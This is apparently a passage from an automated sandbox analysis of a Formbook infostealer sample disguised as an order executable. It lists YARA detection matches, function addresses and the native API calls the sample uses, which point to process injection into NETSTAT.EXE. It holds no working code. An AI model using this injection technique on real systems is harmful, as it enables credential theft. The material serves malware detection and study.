Source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_008C7EF8		0_2_008C7EF8
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_02B8C3BC		0_2_02B8C3BC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_02B8E330		0_2_02B8E330
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_02B8E32B		0_2_02B8E32B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C7D88		0_2_076C7D88
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C7A28		0_2_076C7A28
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076CA268		0_2_076CA268
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076CA258		0_2_076CA258
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076CA008		0_2_076CA008
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076CA018		0_2_076CA018
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C7D77		0_2_076C7D77
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C5BE2		0_2_076C5BE2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C5BF0		0_2_076C5BF0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076C7A18		0_2_076C7A18
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0040102A		5_2_0040102A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041C16A		5_2_0041C16A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041C97E		5_2_0041C97E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041BCEC		5_2_0041BCEC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00408C8B		5_2_00408C8B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00408C90		5_2_00408C90
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00402D87		5_2_00402D87
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041CFB1		5_2_0041CFB1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00527EF8		5_2_00527EF8
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAB090		5_2_00FAB090
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA830		5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051002		5_2_01051002
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106E824		5_2_0106E824
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB99BF		5_2_00FB99BF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010620A8		5_2_010620A8
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB4120		5_2_00FB4120
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010628EC		5_2_010628EC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9F900		5_2_00F9F900
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01062B28		5_2_01062B28
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0103CB4F		5_2_0103CB4F
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB236		5_2_00FBB236
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105DBD2		5_2_0105DBD2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010503DA		5_2_010503DA
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010423E3		5_2_010423E3
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCABD8		5_2_00FCABD8
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0104FA2B		5_2_0104FA2B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCEBB0		5_2_00FCEBB0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBEB9A		5_2_00FBEB9A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC138B		5_2_00FC138B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010622AE		5_2_010622AE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAB40		5_2_00FBAB40
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054AEF		5_2_01054AEF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA309		5_2_00FBA309
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01062D07		5_2_01062D07
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01061D55		5_2_01061D55
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01052D82		5_2_01052D82
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010625DD		5_2_010625DD
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA841F		5_2_00FA841F
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAD5E0		5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105D466		5_2_0105D466
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC2581		5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F90D20		5_2_00F90D20
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106DFCE		5_2_0106DFCE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB6E30		5_2_00FB6E30
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01061FF1		5_2_01061FF1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105D616		5_2_0105D616
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01041EB6		5_2_01041EB6
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01062EF7		5_2_01062EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382138B		14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382EBB0		14_2_0382EBB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B03DA		14_2_038B03DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038BDBD2		14_2_038BDBD2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382ABD8		14_2_0382ABD8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038A23E3		14_2_038A23E3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A309		14_2_0381A309
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C2B28		14_2_038C2B28
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381AB40		14_2_0381AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0389CB4F		14_2_0389CB4F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C22AE		14_2_038C22AE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B4AEF		14_2_038B4AEF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038AFA2B		14_2_038AFA2B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381B236		14_2_0381B236
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038199BF		14_2_038199BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037FF900		14_2_037FF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03814120		14_2_03814120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0380B090		14_2_0380B090
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038220A0		14_2_038220A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C20A8		14_2_038C20A8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C28EC		14_2_038C28EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B1002		14_2_038B1002
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038CE824		14_2_038CE824
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381A830		14_2_0381A830
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038CDFCE		14_2_038CDFCE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C1FF1		14_2_038C1FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C2EF7		14_2_038C2EF7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038BD616		14_2_038BD616
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03816E30		14_2_03816E30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03822581		14_2_03822581
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B2D82		14_2_038B2D82
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C25DD		14_2_038C25DD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037F0D20		14_2_037F0D20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0380D5E0		14_2_0380D5E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C2D07		14_2_038C2D07
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C1D55		14_2_038C1D55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B4496		14_2_038B4496
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0380841F		14_2_0380841F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038BD466		14_2_038BD466
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0381B477		14_2_0381B477
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2C97E		14_2_00B2C97E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B18C90		14_2_00B18C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B18C8B		14_2_00B18C8B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2BCEC		14_2_00B2BCEC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B12D90		14_2_00B12D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B12D87		14_2_00B12D87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B12FB0		14_2_00B12FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2CFB1		14_2_00B2CFB1

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: String function: 037FB150 appears 136 times
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: String function: 00F9B150 appears 145 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_004185F0 NtCreateFile,		5_2_004185F0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_004186A0 NtReadFile,		5_2_004186A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00418720 NtClose,		5_2_00418720
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_004187D0 NtAllocateVirtualMemory,		5_2_004187D0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_004185EB NtCreateFile,		5_2_004185EB
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00418643 NtCreateFile,		5_2_00418643
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041869A NtReadFile,		5_2_0041869A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041871A NtClose,		5_2_0041871A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD98F0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_00FD98F0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9860 NtQuerySystemInformation,LdrInitializeThunk,		5_2_00FD9860
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9840 NtDelayExecution,LdrInitializeThunk,		5_2_00FD9840
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD99A0 NtCreateSection,LdrInitializeThunk,		5_2_00FD99A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_00FD9910
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9A50 NtCreateFile,LdrInitializeThunk,		5_2_00FD9A50
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9A20 NtResumeThread,LdrInitializeThunk,		5_2_00FD9A20
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9A00 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00FD9A00
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD95D0 NtClose,LdrInitializeThunk,		5_2_00FD95D0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9540 NtReadFile,LdrInitializeThunk,		5_2_00FD9540
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_00FD96E0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9660 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_00FD9660
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9FE0 NtCreateMutant,LdrInitializeThunk,		5_2_00FD9FE0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD97A0 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_00FD97A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9780 NtMapViewOfSection,LdrInitializeThunk,		5_2_00FD9780
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9710 NtQueryInformationToken,LdrInitializeThunk,		5_2_00FD9710
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD98A0 NtWriteVirtualMemory,		5_2_00FD98A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FDB040 NtSuspendThread,		5_2_00FDB040
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9820 NtEnumerateKey,		5_2_00FD9820
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD99D0 NtCreateProcessEx,		5_2_00FD99D0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9950 NtQueueApcThread,		5_2_00FD9950
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9A80 NtOpenDirectoryObject,		5_2_00FD9A80
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9A10 NtQuerySection,		5_2_00FD9A10
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FDA3B0 NtGetContextThread,		5_2_00FDA3B0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9B00 NtSetValueKey,		5_2_00FD9B00
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD95F0 NtQueryInformationFile,		5_2_00FD95F0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9560 NtWriteFile,		5_2_00FD9560
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FDAD30 NtSetContextThread,		5_2_00FDAD30
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9520 NtWaitForSingleObject,		5_2_00FD9520
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD96D0 NtCreateKey,		5_2_00FD96D0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9670 NtQueryInformationProcess,		5_2_00FD9670
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9650 NtQueryValueKey,		5_2_00FD9650
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9610 NtEnumerateValueKey,		5_2_00FD9610
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FDA770 NtOpenThread,		5_2_00FDA770
